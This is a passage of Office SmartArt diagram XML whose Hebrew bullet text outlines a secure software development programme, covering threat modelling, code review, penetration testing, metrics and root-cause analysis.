              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId10"/>
            </a:rPr>
            <a:t>ובדיקות</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="he-IL" sz="950" dirty="0" smtClean="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t> פעילות לתוך תהליכי הפיתוח והתפעול. הפעילויות כוללות </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="he-IL" sz="950" dirty="0" smtClean="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId11"/>
            </a:rPr>
            <a:t>מתאר איום</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="he-IL" sz="950" dirty="0" smtClean="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>, תכנון מאובטח </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="he-IL" sz="950" dirty="0" smtClean="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId12"/>
            </a:rPr>
            <a:t>ובדיקת התכנון</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="he-IL" sz="950" dirty="0" smtClean="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>, פיתוח מאובטח </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="he-IL" sz="950" dirty="0" smtClean="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId13"/>
            </a:rPr>
            <a:t>ובדיקת קוד</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="he-IL" sz="950" dirty="0" smtClean="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>, </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="he-IL" sz="950" dirty="0" smtClean="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId14"/>
            </a:rPr>
            <a:t>בדיקות חוסן</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="he-IL" sz="950" dirty="0" smtClean="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t> ותהליכי תיקון.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="950" dirty="0">
            <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{23E825C3-859B-4E66-902F-1BEE8B85DD4D}" type="parTrans" cxnId="{FC47F48B-A8C6-45FA-A45F-68D8935F8994}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{BE5F987D-74DF-4689-8D2E-3371DA6D6FF0}" type="sibTrans" cxnId="{FC47F48B-A8C6-45FA-A45F-68D8935F8994}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{5347AAB2-CA03-4390-B534-F57E3A409681}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr>
        <a:solidFill>
          <a:schemeClr val="bg1">
            <a:lumMod val="95000"/>
            <a:alpha val="90000"/>
          </a:schemeClr>
        </a:solidFill>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr lIns="91440" rIns="91440"/>
        <a:lstStyle/>
        <a:p>
          <a:pPr marL="82800" indent="-82800" algn="r" rtl="1"/>
          <a:r>
            <a:rPr lang="he-IL" sz="950" dirty="0" smtClean="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>ספקו גורמים מומחים </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="he-IL" sz="950" dirty="0" smtClean="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId15"/>
            </a:rPr>
            <a:t>ושירותי תמיכה עבור מפתחים וצוותי ניהול פרוייקטים</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="he-IL" sz="950" dirty="0" smtClean="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t> לטובת הצלחת התהליך.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="950" dirty="0">
            <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{9B4E8A52-55C6-44B5-BC9C-57BE53B6906F}" type="parTrans" cxnId="{75073D3D-45B2-489E-98C0-1D506F1D3708}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{1479C321-D68D-4EA1-854C-E17ACA4EE2C4}" type="sibTrans" cxnId="{75073D3D-45B2-489E-98C0-1D506F1D3708}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{9DB6222C-B747-44A0-8596-8867E9078A8E}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr>
        <a:solidFill>
          <a:schemeClr val="bg1">
            <a:lumMod val="95000"/>
            <a:alpha val="90000"/>
          </a:schemeClr>
        </a:solidFill>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr lIns="91440" rIns="91440"/>
        <a:lstStyle/>
        <a:p>
          <a:pPr marL="82800" indent="-82800" algn="r" rtl="1"/>
          <a:r>
            <a:rPr lang="he-IL" sz="950" dirty="0" smtClean="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>נהלו באמצעות מדדים. נהלו התייעלות והחלטות מימון בהתבסס על מדדים וניתוח המידע שנאסף. מדדים מכילים התייחסות להמלצות אבטחת מידע ופעילויות, חולשות אבטחה שהתגלו, חולשות שטופלו, כיסוי אפליקטיבי, צפיפות הפגמים לפי סוג ומספר דוגמאות וכו'.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="950" dirty="0">
            <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{8CD2EDA5-FA51-456B-8A53-C84293C82FE4}" type="parTrans" cxnId="{3CF027BB-F681-4949-A053-9243B9F519C4}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C99EFA69-C988-484A-8090-B361D4A2B26E}" type="sibTrans" cxnId="{3CF027BB-F681-4949-A053-9243B9F519C4}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{20D65441-A843-40C0-93BA-BE668573D30E}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr>
        <a:solidFill>
          <a:schemeClr val="bg1">
            <a:lumMod val="95000"/>
            <a:alpha val="90000"/>
          </a:schemeClr>
        </a:solidFill>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr lIns="91440" rIns="91440"/>
        <a:lstStyle/>
        <a:p>
          <a:pPr marL="82800" indent="-82800" algn="r" rtl="1"/>
          <a:r>
            <a:rPr lang="he-IL" sz="950" dirty="0" smtClean="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>נתחו את המידע מפעילויות הטמעה ובדיקות על-מנת לחפש מקור לתקלה (</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="950" dirty="0" smtClean="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>root cause</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="he-IL" sz="950" dirty="0" smtClean="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>) ודפוסי חולשות אבטחה בכדי לקדם ייעול אסטרטגי בצורה שוטפת בכל רחבי הארגון.</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="950" dirty="0" smtClean="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t/>
          </a:r>
          <a:br>
            <a:rPr lang="en-US" sz="950" dirty="0" smtClean="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
          </a:br>
          <a:r>
            <a:rPr lang="he-IL" sz="950" dirty="0" smtClean="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>לימדו מטעויות והציעו הזדמנויות חיוביות לקדם התייעלות.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="950" dirty="0">
            <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{5425BFE1-F309-4EEF-8BA3-047936AD4992}" type="parTrans" cxnId="{E122AA66-B78A-494B-A522-2DE99DA7BC63}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{CE27E584-D862-41AD-A44F-07845EC1AE43}" type="sibTrans" cxnId="{E122AA66-B78A-494B-A522-2DE99DA7BC63}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{71703B9B-47D8-4F48-B97D-9DC075FD943B}" type="pres">
      <dgm:prSet presAssocID="{DA2B7DFC-AE2C-443E-8CBC-87D79BE207FB}" presName="Name0" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:dir/>
          <dgm:animLvl val="lvl"/>
          <dgm:resizeHandles val="exact"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E49726BA-1773-46ED-9FF3-586BF4430A36}" type="pres">
      <dgm:prSet presAssocID="{99114BD6-AB84-47D7-90FA-E674D66B7A70}" presName="linNode" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{13D31E1D-AAA2-4FA3-B46E-809665F827F4}" type="pres">
      <dgm:prSet presAssocID="{99114BD6-AB84-47D7-90FA-E674D66B7A70}" presName="parentText" presStyleLbl="node1" presStyleIdx="0" presStyleCnt="5" custScaleX="30117" custScaleY="89341" custLinFactNeighborX="99814">
        <dgm:presLayoutVars>
          <dgm:chMax val="1"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr>
        <a:prstGeom prst="roundRect">
          <a:avLst/>
        </a:prstGeom>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{ED648348-3383-4156-B7CD-1CB7092349F2}" type="pres">
      <dgm:prSet presAssocID="{99114BD6-AB84-47D7-90FA-E674D66B7A70}" presName="descendantText" presStyleLbl="alignAccFollowNode1" presStyleIdx="0" presStyleCnt="5" custScaleY="104600" custLinFactNeighborX="-30552">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr>
        <a:prstGeom prst="roundRect">
          <a:avLst/>
        </a:prstGeom>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{7AEB17ED-67DE-40AD-82AF-B765FE5DE4A4}" type="pres">
      <dgm:prSet presAssocID="{5934DCE2-D67E-4FF3-9717-AC23829A1B63}" presName="sp" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{2192953A-8EDA-4AC0-AB92-A559610AD6D2}" type="pres">
      <dgm:prSet presAssocID="{5723059F-06B7-4E57-89DB-EF1AC9A66654}" presName="linNode" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{32E4C202-A073-4E81-BC9F-5F3538C94998}" type="pres">
      <dgm:prSet presAssocID="{5723059F-06B7-4E57-89DB-EF1AC9A66654}" presName="parentText" presStyleLbl="node1" presStyleIdx="1" presStyleCnt="5" custScaleX="30023" custScaleY="89239" custLinFactNeighborX="99867">
        <dgm:presLayoutVars>
          <dgm:chMax val="1"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr>
        <a:prstGeom prst="roundRect">
          <a:avLst/>
        </a:prstGeom>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{29555282-7DBF-4954-82C2-561252AD070F}" type="pres">
      <dgm:prSet presAssocID="{5723059F-06B7-4E57-89DB-EF1AC9A66654}" presName="descendantText" presStyleLbl="alignAccFollowNode1" presStyleIdx="1" presStyleCnt="5" custScaleY="96749" custLinFactNeighborX="-30458">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr>
        <a:prstGeom prst="roundRect">
          <a:avLst/>
        </a:prstGeom>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{1EE8983F-39C0-49FF-AD53-824215AC9C92}" type="pres">
      <dgm:prSet presAssocID="{D22B1E2D-9241-472F-8A9E-565E70887137}" presName="sp" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{D13B288C-5416-41CB-97B8-3FF086D123C6}" type="pres">
      <dgm:prSet presAssocID="{BDF0D463-07CB-4904-B045-2FC63D99B581}" presName="linNode" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{F564D79A-2552-48FA-AA2D-99B849FE28FB}" type="pres">
      <dgm:prSet presAssocID="{BDF0D463-07CB-4904-B045-2FC63D99B581}" presName="parentText" presStyleLbl="node1" presStyleIdx="2" presStyleCnt="5" custScaleX="30023" custScaleY="89365" custLinFactNeighborX="99867">
        <dgm:presLayoutVars>
          <dgm:chMax val="1"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr>
        <a:prstGeom prst="roundRect">
          <a:avLst/>
        </a:prstGeom>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F55C0F19-ACD0-452E-8743-4A25E747654D}" type="pres">
      <dgm:prSet presAssocID="{BDF0D463-07CB-4904-B045-2FC63D99B581}" presName="descendantText" presStyleLbl="alignAccFollowNode1" presStyleIdx="2" presStyleCnt="5" custScaleY="101015" custLinFactNeighborX="-30458">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr>
        <a:prstGeom prst="roundRect">
          <a:avLst/>
        </a:prstGeom>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A17B0090-2551-41E3-9B14-B0E324CDDD6A}" type="pres">
      <dgm:prSet presAssocID="{35F82638-1CE8-4F68-915D-3475E1D94C1A}" presName="sp" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{D8C292E2-10B3-4B4F-B80F-989C1AD6F2D8}" type="pres">
      <dgm:prSet presAssocID="{31D7BC77-F301-4E5F-8A9F-BD9C4229C695}" presName="linNode" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{17989DDF-81A9-4A76-BCBA-5B2768E57B7F}" type="pres">
      <dgm:prSet presAssocID="{31D7BC77-F301-4E5F-8A9F-BD9C4229C695}" presName="parentText" presStyleLbl="node1" presStyleIdx="3" presStyleCnt="5" custScaleX="30023" custScaleY="91387" custLinFactNeighborX="99867">
        <dgm:presLayoutVars>
          <dgm:chMax val="1"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr>
        <a:prstGeom prst="roundRect">
          <a:avLst/>
        </a:prstGeom>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{1BBF15A1-D05A-4DF7-B79B-CA1460F5C0E4}" type="pres">
      <dgm:prSet presAssocID="{31D7BC77-F301-4E5F-8A9F-BD9C4229C695}" presName="descendantText" presStyleLbl="alignAccFollowNode1" presStyleIdx="3" presStyleCnt="5" custScaleY="77788" custLinFactNeighborX="-30458">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr>
        <a:prstGeom prst="roundRect">
          <a:avLst/>
        </a:prstGeom>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{4AA9460D-8CBD-4DAC-B193-6D80211E49ED}" type="pres">
      <dgm:prSet presAssocID="{CF4A2635-5775-44A7-B659-F5DBA01CCF0A}" presName="sp" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{3C7B2DDB-3FF6-42A3-9386-7A253E98FD62}" type="pres">
      <dgm:prSet presAssocID="{C40210B5-480D-4766-978A-36F3F23CB9B8}" presName="linNode" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{00DAAF4C-114B-41A9-AAA5-51A8EB19C769}" type="pres">
      <dgm:prSet presAssocID="{C40210B5-480D-4766-978A-36F3F23CB9B8}" presName="parentText" presStyleLbl="node1" presStyleIdx="4" presStyleCnt="5" custScaleX="30023" custScaleY="89165" custLinFactNeighborX="99867">
        <dgm:presLayoutVars>
          <dgm:chMax val="1"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr>
        <a:prstGeom prst="roundRect">
          <a:avLst/>
        </a:prstGeom>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{BCBAC2F4-E546-4A38-8714-1F12CC525401}" type="pres">
      <dgm:prSet presAssocID="{C40210B5-480D-4766-978A-36F3F23CB9B8}" presName="descendantText" presStyleLbl="alignAccFollowNode1" presStyleIdx="4" presStyleCnt="5" custScaleY="102041" custLinFactNeighborX="-30458">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr>
        <a:prstGeom prst="roundRect">
          <a:avLst/>
        </a:prstGeom>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
  </dgm:ptLst>
  <dgm:cxnLst>
    <dgm:cxn modelId="{1C0E3C9D-057D-4A7C-BBF8-086EF4E77137}" srcId="{5723059F-06B7-4E57-89DB-EF1AC9A66654}" destId="{655384AB-6D3C-47AC-B77F-6E015EDEFD4F}" srcOrd="0" destOrd="0" parTransId="{E301BDA2-04A0-471A-AAE0-B2964D1816B7}" sibTransId="{6EBA2F32-A29E-4FE5-9E91-F4CD3AF3B2F9}"/>
    <dgm:cxn modelId="{6DD094FE-124B-4252-ACDD-B54FA2A8D920}" type="presOf" srcId="{D379F1C2-B8BC-4B70-BF67-538728E7556E}" destId="{ED648348-3383-4156-B7CD-1CB7092349F2}" srcOrd="0" destOrd="1" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{159022E7-7B79-4A6C-B318-27C071344661}" type="presOf" srcId="{66AC70C4-7AD9-4A02-8E8E-9E86DB315614}" destId="{ED648348-3383-4156-B7CD-1CB7092349F2}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{FB76F417-AC06-426D-BB63-E9E872C8DFFF}" srcId="{BDF0D463-07CB-4904-B045-2FC63D99B581}" destId="{B794BD9D-2A2A-43F9-A836-2AC112F24E37}" srcOrd="1" destOrd="0" parTransId="{DC0FA470-6D6E-48C6-8AD9-A1938F545EB0}" sibTransId="{3FDD3E22-9607-41F3-B3B0-09AD922A4942}"/>
    <dgm:cxn modelId="{E477C266-8354-2E4E-B998-1968C3E9AAC3}" type="presOf" srcId="{99114BD6-AB84-47D7-90FA-E674D66B7A70}" destId="{13D31E1D-AAA2-4FA3-B46E-809665F827F4}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{BBB13087-447B-294F-AFB1-D3712B8353B8}" type="presOf" srcId="{C40210B5-480D-4766-978A-36F3F23CB9B8}" destId="{00DAAF4C-114B-41A9-AAA5-51A8EB19C769}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{99151191-A357-4F67-A0F2-C9F6AC28A94C}" srcId="{DA2B7DFC-AE2C-443E-8CBC-87D79BE207FB}" destId="{31D7BC77-F301-4E5F-8A9F-BD9C4229C695}" srcOrd="3" destOrd="0" parTransId="{7BC25BDC-3278-4082-B675-15E8A5144241}" sibTransId="{CF4A2635-5775-44A7-B659-F5DBA01CCF0A}"/>
    <dgm:cxn modelId="{1690D1B8-8606-418A-A11B-06A2E77A134C}" type="presOf" srcId="{20D65441-A843-40C0-93BA-BE668573D30E}" destId="{BCBAC2F4-E546-4A38-8714-1F12CC525401}" srcOrd="0" destOrd="1" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{ACFDD1AF-78F8-416A-8259-64B4B20A1F12}" type="presOf" srcId="{7C5306CB-62DD-439C-9042-9673AE093108}" destId="{F55C0F19-ACD0-452E-8743-4A25E747654D}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
